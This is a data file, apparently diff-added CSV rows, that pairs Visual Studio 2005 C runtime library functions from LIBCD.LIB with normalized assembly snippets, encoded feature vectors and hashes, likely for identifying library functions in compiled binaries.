+__mbsnbcnt,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",sUYUnV6jgyfIUl/XSCQihgAAAAAAAAAAPsqG2X0JSDQAAAAAd9y22F6jgyexRhSdfQlINEgkIobh2QV5yFJf10gkIoYAAAAA3NZFkn0JSDQAAAAAXqODJz7KhtkAAAAA4dkFeUgkIoZ33LbY,[],9dc2db92ac913a15d97b3f3e7c74a0976b5b2416,VS2005,LIBCD.LIB
+_gmtime,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",ZnkxNU+LzAoAAAAAT4vMCgAAAAAAAAAAlnPwX/Qp7ggAAAAAJqqgw5Zz8F/0Ke4IG8wqWz7Khtk6gK2N9CnuCGW6GR0AAAAAo+tDICaqoMMbzCpbCZosBKZssjxmeTE1+905Pk+LzAoAAAAAOoCtjSaqoMMAAAAAPsqG2WW6GR0AAAAAXqODJz7KhtkAAAAApmyyPCaqoMOj60Mg9CnuCPQp7ggAAAAAZboZHfvdOT5eo4MnPsqG2SaqoMMAAAAA,[],cba48ffeee405468e5d3538925154d51dd617b7d,VS2005,LIBCD.LIB
+__wspawnve,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",XqODJ/ZV5+QAAAAAnIZROPh3+cGDrkNenIZROF6jgyclFsgrhrb7oI+4YyYAAAAAg65DXvZV5+T4d/nBJRbIK16jgydQLtku+Hf5wfZV5+QAAAAArydXXE+LzAoAAAAA9lXn5FAu2S69np4ZVcJDApyGUTgAAAAAUC7ZLmKkP2OvJ1dcXqODJz7KhtkAAAAAj7hjJoOuQ14AAAAAg65DXkFF0BuPuGMmvZ6eGTUWchMO0PMoj7hjJkFF0BsAAAAAQUXQG0+LzAoAAAAADtDzKDUWchMAAAAAT4vMCgAAAAAAAAAAPsqG2ZyGUTgAAAAArydXXE+LzAoAAAAAzdJe7JyGUTichlE4nIZROI+4YyaBPQJ8YqQ/Y16jgycAAAAAgT0CfF6jgyeGtvugNRZyE4OuQ14AAAAAUC7ZLlXCQwKvJ1dc,[],52e62adeabe1a3387c34e54be9b0ad126b43458c,VS2005,LIBCD.LIB
+___wtomb_environ,"PUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",Sv/IwkwFoBPEkqZoTAWgE6Jc0ozEkqZoxJKmaE+LzAoAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAolzSjHblFGYAAAAAduUUZibu4WU+BuR8PgbkfEr/yMLEkqZoxJKmaE+LzAoAAAAAxJKmaE+LzAoAAAAAer1pqnblFGYAAAAA,[],6dd1219a9369fe1047d3be1ed5e6e9731653a440,VS2005,LIBCD.LIB
+__execlpe,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",xhVotpyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vl+iVSyQAAAAAAAAAAnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEB5FK8n6QXY29Of7zK5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vlXqODJ0G4PzQAAAAAO4+r5eRSvJ8AAAAApBdjb+RSvJ+S9NEBkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAATn+8ykG4PzQAAAAAO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vlQbg/NPolUsleo4MnnIZROORSvJ+S9NEB,[],c8a41def82dc06f0b44b9bbaaf1f3e40b7a48946,VS2005,LIBCD.LIB
+__fcloseall,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]\nMOV R32,DWORD PTR DS:[R32+R32*4]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,-1\nJCC CONST",1RzUtgAAAAAAAAAANRZyE1KlaoQAAAAATSX5ATUWchMbfI4eugCbYpyGUTjU2e7LnIZRODUWchMAAAAAUqVqhNUc1LZNJfkBG3yOHpyGUTi6AJti7ois/tUc1LZNJfkBotU0ru6IrP4AAAAA1NnuyzUWchMAAAAA,[],072bfc2ec586181f2f8b00df472b18e90772dcc0,VS2005,LIBCD.LIB
+_$I10_OUTPUT,"MOV R16,WORD PTR SS:[EBP+CONST]\nADD CONST6,CONST\nMOV WORD PTR SS:[EBP+CONST],R16\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",nIZROJyGUTg67dNXOu3TVz7KhtkAAAAAbUkFBrd2pZM3XfGVSQ+Q5JyGUTgicX3MnIZROFJnfwZSZ38GdGRS+pyGUTgAAAAAN13xlT7KhtkAAAAAnIZROF6d+sT8mf/L/Jn/y5yGUTgAAAAAt3alk5+CQUlU6OTXnIZROIsNFEw5CVNXInF9zE+LzAoAAAAA/v35wkl1hecEt04YOQlTVzUWchMAAAAABLdOGJyGUThJD5DkUmd/BosNFEyLDRRMjR46Qf79+cKLrf/0PsqG2ZyGUTgAAAAAPsqG2ZyGUTgAAAAAUryiYzUWchMAAAAAnIZROI0eOkEicX3MnIZROF6d+sQ67dNXVOjk15+CQUkAAAAAOu3TVz7KhtkAAAAAL1ATSiJMqqcElgzti63/9FJnfwachlE4n4JBSVg5tLQAAAAAXp36xJyGUTgAAAAAQUXQG0+LzAoAAAAAnIZROHRkUvqWc/BfT4vMCgAAAAAAAAAAXqODJ7d2pZMAAAAA2V75zF6jgydeo4MnlnPwX3RkUvoAAAAAUmd/BlJnfwZSvKJjbUkFBrd2pZNeo4MnNRZyE0FF0BsAAAAAOQlTVzUWchMAAAAAt3alk7d2pZNtSQUG1Nnuy9le+czG/cspPsqG2bd2pZMAAAAAiw0UTBJjSMCchlE4Ikyqp1JnfwYAAAAAUmd/Bo0eOkGchlE4BJYM7VJnfwYAAAAAnIZRONle+czG/cspWDm0tEFF0BsAAAAAxv3LKdTZ7ssAAAAAnIZROBJjSMA5CVNXnIZROI0eOkGchlE4XqODJz7KhtkAAAAAt3alk1g5tLRJxIz4XqODJ7d2pZMAAAAAiw0UTIsNFEychlE4PsqG2bd2pZMAAAAASXWF55yGUThJD5DkInF9zE+LzAoAAAAAEmNIwDUWchMAAAAAScSM+E+LzAoAAAAAt3alk7d2pZNtSQUG,[],f53c9661e4f810cda5bc2efb20e2c7b4fa94bde3,VS2005,LIBCD.LIB
+__wrmdir,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",bGYbnJyGUTgAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAqGrdejqNu5dsZhucOo27lybu4WWZeO5vmXjub0+LzAoAAAAAnIZROCbu4WWZeO5v,[],b236fb76339ec84c20a0be05b52c9481d0511f90,VS2005,LIBCD.LIB
+__mbstok,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0",chMCgJyGUTgrieMfnIZROCQDw502O0ipCED6TeHZBXlmeTE1QUXQG0+LzAoAAAAA4dkFeQ3MwAF33LbYT4vMCgAAAAAAAAAANjtIqQhA+k0AAAAAd9y22L5aREWitvRrvlpERUFF0BsAAAAAK4njH0+LzAoAAAAADczAAU+LzAoAAAAA4dkFeXfcttgZpmb/d9y22N4kgikP0VPtJAPDnQhA+k1meTE13iSCKRmmZv/h2QV5GaZm/0FF0BsAAAAAZnkxNU+LzAoAAAAAorb0a0FF0BsAAAAAD9FT7d4kgikNzMABZnkxNU+LzAoAAAAA,[],9270312d913e88cdd82f9b3d62b4f31a952fca33,VS2005,LIBCD.LIB
+__mbclen,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nMOV R32,R32",SdZRIAAAAAAAAAAA,[],624f42af951e0afb94513f8c2ad7582b0df307c3,VS2005,LIBCD.LIB
+__setenvp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",rYMjM/VI3EF1VYvsEIVrf7TlLH4wMf44WXDGi6QXY28AAAAApBdjbzktHJVtSQUGpBdjb/VI3EF1VYvssQw7e6QXY28AAAAAbUkFBllwxosDQqdy/wESNgAAAAAAAAAAMDH+ODktHJVtSQUGdVWL7F6jgyf/ARI2dpz9mqQXY28AAAAAtOUsfjktHJVtSQUGXqODJ62DIzMAAAAA9UjcQQAAAAAAAAAAA0KncqQXY28AAAAAOS0clXac/ZqxDDt7,[],1eb2baecdc93c3d446dafa270d8b8877fe54fd6c,VS2005,LIBCD.LIB
+__statusfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nWAIT\nFSTSW WORD PTR SS:[EBP+CONST]",5JRHzwAAAAAAAAAA,WYaBMUIiA0s+yobZQiIDS0IiA0slRTTkQiIDS9Uc1La/Hkk11RzUtgAAAAAAAAAAQiIDS0IiA0tRsy0Ui+/TakIiA0sSvRKvJUU05EIiA0sAAAAA23DCjkIiA0sSvRKvvx5JNQAAAAAAAAAAPsqG2UIiA0sAAAAAQiIDS9twwo6L79NqUbMtFNUc1La/Hkk1Er0Sr0IiA0tRsy0U,fe1061f67be3529a2929f5389009b17d77a7c321,VS2005,LIBCD.LIB
+__clearfp,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nFSTSW WORD PTR SS:[EBP+CONST]\nFCLEX",2QpzygAAAAAAAAAA,23DCjkIiA0sSvRKvvx5JNQAAAAAAAAAAEr0Sr0IiA0tRsy0UQiIDS9twwo6L79NqUbMtFNUc1La/Hkk11RzUtgAAAAAAAAAAWYaBMUIiA0sSvRKvQiIDS0IiA0tRsy0UQiIDS9Uc1La/Hkk1i+/TakIiA0sSvRKvQiIDS0IiA0tRsy0UEr0Sr0IiA0tRsy0UUbMtFNtwwo6L79Nq,29796af412753c462c0831f67692047335b2e995,VS2005,LIBCD.LIB
+__controlfp,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST",7h0umAAAAAAAAAAA,GolIdwAAAAAAAAAA,f4afdcbe42e2eff45b9117963ae164fb5374a57d,VS2005,LIBCD.LIB
+__control87,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]",GolIdwAAAAAAAAAA,FjfI1HXg3tyLDRRMINR4YUIiA0sSvRKvQiIDSz1qQEAVNATSY+PlfXXg3tyLDRRMUbMtFD1qQEAVNATSiw0UTBY3yNReo4MnFTQE0osNFEyLDRRMEr0Sr0IiA0tRsy0Uiw0UTKxPCJ6LDRRMPWpAQIsNFEyLDRRMQiIDS0IiA0tRsy0Uiw0UTHFalDpeo4MnXqODJw7iWi0AAAAAcVqUOg7iWi0AAAAAUbMtFNtwwo6L79Nqiw0UTC1hKuCchlE4QiIDS9twwo6L79NqnIZROHFalDqLDRRMdeDe3NUc1La/Hkk1iw0UTC1hKuBeo4Mni+/TakIiA0sSvRKvXqODJ2Pj5X0AAAAADuJaLdUc1La/Hkk123DCjkIiA0sSvRKvXqODJ2Pj5X0AAAAAcVqUOmPj5X0AAAAAEr0Sr0IiA0tRsy0Uvx5JNQAAAAAAAAAALWEq4GPj5X0AAAAAQiIDS0IiA0tRsy0U1RzUtgAAAAAAAAAALWEq4GPj5X0AAAAArE8Ing7iWi0AAAAA,df2195eabbe54bdd5ecc48fca2d5b54a7350d9eb,VS2005,LIBCD.LIB
+__fpreset,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",NhgJF8Sg0gk/m9h2xKDSCQAAAAAAAAAA0El2PMSg0gk2GAkXP5vYdsSg0gkAAAAA,[],db71672e751036164686f9baec3bcd52567f3f46,VS2005,LIBCD.LIB
+__mbscoll,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nPUSH -1\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",2jcg2k+LzAoAAAAAl3FRnk+LzAoAAAAA02k2Ato3INqXcVGeT4vMCgAAAAAAAAAA,[],add0c41aa6c7547b376e982f98bafeb137a9b612,VS2005,LIBCD.LIB
+_atoi,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",NV3SuwAAAAAAAAAA,T4vMCgAAAAAAAAAAnIZROEFF0BtRcUO6viCdwSQDw50AAAAAnIZROBJ0DUrIUl/XEIVrf/c0exDa32ljJAPDnfc0exDa32ljyFJf1yQDw50AAAAA9zR7EBJ0DUrIUl/X8u/Zom/BMvvs+e7F7PnuxZyGUTgAAAAAb8Ey+5yGUTi+IJ3BJAPDnW/BMvvs+e7FEnQNShpAUqGchlE4UXFDuk+LzAoAAAAAnIZROPLv2aIaQFKhGkBSoW/BMvvs+e7F2t9pY5yGUTgAAAAAQUXQG0+LzAoAAAAAnIZROJyGUTi+IJ3B,a1cd9a193cdca3f0d3bd9876c6debf52e442d563,VS2005,LIBCD.LIB
+_atol,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROBJ0DUrIUl/XEIVrf/c0exDa32lj8u/Zom/BMvvs+e7FyFJf1yQDw50AAAAA9zR7EBJ0DUrIUl/Xb8Ey+5yGUTi+IJ3BnIZROJyGUTi+IJ3BviCdwSQDw50AAAAAnIZROEFF0BtRcUO6nIZROPLv2aIaQFKhJAPDnW/BMvvs+e7FEnQNShpAUqGchlE4UXFDuk+LzAoAAAAA2t9pY5yGUTgAAAAAGkBSoW/BMvvs+e7F7PnuxZyGUTgAAAAAJAPDnfc0exDa32ljQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAA,[],650d295a1ca5bc21548dfbd9557904c23666adc9,VS2005,LIBCD.LIB
+__atoi64,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",L6JF1QAAAAAAAAAAyFJf1yQDw50AAAAA9zR7EBJ0DUrIUl/XnIZROJyGUTg3C7ZanIZROL/RaZ0M7t/kNwu2WiQDw50AAAAADO7f5C+iRdUAAAAAnIZROFuahJ/yGRW/EnQNSvIZFb+chlE47PnuxZyGUTgAAAAAb8Ey+5yGUTg3C7Za8hkVv2/BMvvs+e7FJAPDnW/BMvvs+e7FW5qEn2/BMvvs+e7FJAPDnfc0exDa32ljnIZROBJ0DUrIUl/Xv9FpnS+iRdUAAAAAeTzoLPc0exDa32lj2t9pY5yGUTgAAAAA,[],ba6d575484c962023f47202695fbc0331fb26325,VS2005,LIBCD.LIB
+__wcsdup,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",DczAAU+LzAoAAAAAJmlO7ibu4WVAPBIrQDwSK0+LzAoAAAAAjLRRTiZpTu4NzMABJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],1027f95d90ac37ced2d2b9cd8ba707eff499f946,VS2005,LIBCD.LIB
+___initstdio,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nCMP DWORD PTR DS:[R32+R32*8],-1\nJCC CONST",lI5k4ZyGUTgAAAAAEQ7lZfQp7ggM7hS9iO00AdTZ7ssAAAAA1Nnuy0+LzApzRErtWeJn99TZ7ssAAAAA9CnuCJyGUTgAAAAADO4UvfQp7giUjmThc0RK7V6jgydZ4mf3nIZROE+LzApzRErtJAPDnREO5WVJJYD0SSWA9PQp7ggM7hS9GaZm/xEO5WUAAAAAc0RK7VniZ/dzRErtchMCgCQDw50Zpmb/T4vMCgAAAAAAAAAA1Nnuy/Qp7giI7TQBXqODJ9TZ7ssAAAAA9CnuCJyGUTgAAAAAnIZROPQp7giI7TQB,[],0819fb901ef3863907ab7829c48f768b23e2eac9,VS2005,LIBCD.LIB
+___endstdio,"PUSH EBP\nMOV EBP,ESP\nCALL CONST\nMOVSX R32,BYTE PTR DS:[0]\nTEST R32,R32\nJCC CONST",wI77ggDh1mvBjO7vwYzu7wDh1msAAAAAAOHWawAAAAAAAAAA,[],6a90add5f21c3fd442fe0db3a50f7f5ee1ff6e24,VS2005,LIBCD.LIB
+__mbsnextc,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nSHL R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",6o0XS/llsnAAAAAA+WWycAAAAAAAAAAApIkzyPllsnDqjRdL,[],7b94013ef41e4993ac0684a9402c0cd22fdd6125,VS2005,LIBCD.LIB
+_is_wctype,"PUSH EBP\nMOV EBP,ESP\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",O/fVDAAAAAAAAAAA,T4vMCgAAAAAAAAAAeFVtebG4kJau7iL3DczAAU+LzAoAAAAADczAAU+LzAoAAAAAsCQoGQAAAAAAAAAAwg3kzHhVbXkNzMABsbiQlrAkKBkNzMABru4i97AkKBkAAAAA,6929b7533b52efc6620b9df4d739198065d07383,VS2005,LIBCD.LIB
+_iswctype,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",T4vMCgAAAAAAAAAAeFVtebG4kJau7iL3DczAAU+LzAoAAAAAwg3kzHhVbXkNzMABDczAAU+LzAoAAAAAru4i97kz3aAAAAAAsbiQlrkz3aANzMABuTPdoE+LzAoAAAAA,[],e219e17eb21a6b2b749f0179efc064c0d8fb9174,VS2005,LIBCD.LIB
+___crtGetLocaleInfoW,"MOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD CONST2,CONST\nAND R8,CONST\nCALL CONST\nMOV DWORD PTR SS:[EBP+CONST],ESP\nMOV DWORD PTR SS:[EBP+CONST],ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]",nIZROB3mK+YNzMAB0UiUpSbu4WWchlE4DczAATEuOrEAAAAAHeYr5pyGUTgNzMABnIZROOBf4lhzIg5wcyIOcOfdfUtmeTE136qlk9+qpZMZpmb/4F/iWOfdfUtmeTE1DczAATEuOrEAAAAA36qlk2Z5MTUZpmb/nIZROMoAKl5rNqx4GaZm/yQDw50AAAAAazaseKA3OqEAAAAAZnkxNTEuOrEAAAAA5919S5yGUTgAAAAAygAqXqA3OqEAAAAAGaZm/yQDw50AAAAAZnkxNTEuOrEAAAAAJAPDndFIlKVVrii4oDc6oTEuOrEAAAAAVa4ouDEuOrEAAAAAJu7hZTEuOrEAAAAALaOCjSQDw53fqqWTMS46sQAAAAAAAAAA,[],09c17ae81ebdd7331fb8a52814c8599eb6ca0731,VS2005,LIBCD.LIB
+__lrotl,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",jc0jjAAAAAAAAAAA,1RzUtgAAAAAAAAAAfQlINNUc1LZYCOyXJUU05F6jgycAAAAAWMUdTH0JSDQAAAAAWAjsl16jgyclRTTkXqODJ30JSDQAAAAA,ecbf48519510b8087b8a3a1b0a6178d2893b9988,VS2005,LIBCD.LIB
+__rotl,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",fQlINNUc1LZYCOyXJUU05F6jgycAAAAAWMUdTH0JSDQAAAAAWAjsl16jgyclRTTkXqODJ30JSDQAAAAA1RzUtgAAAAAAAAAA,[],91aaad68ab0b15cd6b965bba4632a5303eba854a,VS2005,LIBCD.LIB
+__mbsupr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",d9y22L6C0LFNiF1Ep0JzBTUWchMAAAAA7RHWbqdCcwUAAAAADczAAU+LzAoAAAAARA1DpUFF0Bt33LbYNRZyE0QNQ6UAAAAAXqODJzUWchMAAAAAkfDUPF6jgycbb7V/voLQsUGcaOTtEdZuQUXQG0+LzAoAAAAAFJJSQUFF0Bt33LbYT4vMCgAAAAAAAAAAG2+1f16jgycAAAAATYhdRJHw1DwNzMABQZxo5KdCcwUAAAAAcmDV8xSSUkEAAAAA,[],8fdc1ee66e1f03f1cc3470dc5684b08205d13445,VS2005,LIBCD.LIB
+__mbcjmstojis,"CMP DWORD PTR SS:[EBP+CONST],CONST\nSBB R32,R32\nAND R8,CONST\nADD R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST",iw0UTA3MwAGbORlvUgQ0WcSgsoDLgsuVnHoxAIsNFEwAAAAAZnkxNU+LzAoAAAAAT4vMCgAAAAAAAAAAmzkZbw3MwAGbORlvmzkZb0FF0BsNzMABfR0Jppx6MQAqi6MDJElloH0dCaZmeTE1KoujA4sNFEwAAAAAy4LLlU+LzAoAAAAAiw0UTA3MwAGLDRRMQUXQG0+LzAoAAAAAxKCygGZ5MTUkSWWgDczAAU+LzAoAAAAA,[],aa5e9258b36803e809b8af18f1e7baf4dafde596,VS2005,LIBCD.LIB
+__mbcjistojms,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nSHR R32,CONST\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",DpXpTD7KhtmchlE4y4LLlU+LzAoAAAAAnIZROD7KhtnIUl/XXqODJ/1o55oAAAAAPsqG2f1o55oAAAAAPsqG2YfJdu8AAAAA3bpM1A3MwAGchlE4nIZROA3MwAGchlE4/WjnmofJdu8+yobZnIZROA3MwAGchlE4h8l270+LzAoAAAAAUgQ0Wd26TNTLgsuVnIZROA6V6UwNzMAByFJf116jgycAAAAAT4vMCgAAAAAAAAAAPsqG2V6jgycAAAAADczAAU+LzAoAAAAA,[],92197d9a693c894d5f609b0497207db5a8390c4f,VS2005,LIBCD.LIB
+__mbsset,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR DS:[0],0\nJCC CONST",6V6FveHZBXkAAAAAXqODJ0FF0BsAAAAAK4njH0+LzAoAAAAA4AIthWMBGhwrieMfIkyqp16jgycAAAAAYwEaHOHZBXk1Gxcv4dkFeV6jgydNWYW9XqODJ+HZBXkAAAAAQUXQG0+LzAoAAAAA4dkFeUFF0BvpXoW9T4vMCgAAAAAAAAAA6V6FvV6jgycAAAAANRsXL+HZBXkAAAAATVmFvSJMqqfpXoW9,[],52bf1a2aaaf23a89f34b790ca3fe3aae07ade6ef,VS2005,LIBCD.LIB
+__mbschr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],R32",PsqG2Q60/Q4AAAAAmvzAEdNr8tqxRhSdXqODJ9Qn+1gAAAAANRZyEz7KhtkAAAAADrT9DtQn+1ia/MARmC8l00+LzAoAAAAADczAAU+LzAoAAAAAchMCgF6jgycrieMfIPhK8V6jgyeYLyXTuyGU9ibu4WWgNzqhXqODJzUWchMAAAAA02vy2jUWchNeo4MnK4njH0+LzAoAAAAAoDc6oU+LzAoAAAAAsUYUnSD4SvENzMABJu7hZU+LzAoAAAAA1Cf7WLshlPYAAAAAT4vMCgAAAAAAAAAAXqODJw60/Q4AAAAA,[],f9dd5e184b490206da5445201eb9d39e2ad1c5d9,VS2005,LIBCD.LIB
+_wcstoul,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",yCGT8gAAAAAAAAAA,XqODJ7AGllUAAAAAiw0UTJyGUTgilFzz6H4nTJZz8F/0Ke4Ig65DXgmX7pxeo4MnzAcsUIOuQ14AAAAAnIZROJyGUTichlE4IpRc8w6V6Uz0Ke4IQCsHuhnzF9YAAAAA9CnuCJyGUTgAAAAAmzkZb5yGUTgx1FhfRPMkz16jgyf+JFwDlnPwX5yGUTgAAAAA9CnuCJyGUTgAAAAAnIZROL9L8k0SWReG+Hf5wfQp7ggAAAAA9CnuCJyGUTgAAAAA/7CKghnzF9YAAAAAElkXhr9L8k3ofidMDpXpTJZz8F/0Ke4IsAaWVQ6V6UychlE4/iRcA4OuQ14AAAAAg65DXiVFNORvcIwNnIZROJyGUTichlE46H4nTPT91pfofidMnIZROJyGUTichlE4lnPwX5yGUTgAAAAAnIZROPQp7gj4d/nBGfMX1ps5GW9AKwe66H4nTL9L8k30/daX9CnuCJyGUTgAAAAAnIZROA6V6UzxZLvOnIZROGZ5MTXxZLvO8WS7zg6V6UwAAAAAXqODJ7AGllUAAAAA8WS7zmZ5MTUAAAAAJUU05Cue9o4AAAAA9CnuCJyGUTgAAAAA9P3Wl79L8k0AAAAAMdRYX5yGUTgAAAAADpXpTEFF0But/Rq5DpXpTCKUXPMOlelMZnkxNU+LzAoAAAAACZfunMFP/SeDrkNeqf+9TJyGUTgAAAAAnIZROJyGUTibORlvrf0auUFF0BsAAAAADpXpTJyGUTgOlelMmzkZb+h+J0z0Ke4IQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAmzkZb5s5GW+p/71Mv0vyTUTzJM/MByxQb3CMDSVFNOTBT/0niw0UTCKUXPMOlelMDpXpTA6V6UyLDRRMGfMX1kTzJM/MByxQ6H4nTPQp7gjofidMDpXpTJyGUTiLDRRMwU/9Jyue9o4AAAAAK572jhnzF9YAAAAA,93da81352ca9c14dcb799bfc9926b6291abc164f,VS2005,LIBCD.LIB
+_wcstol,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR 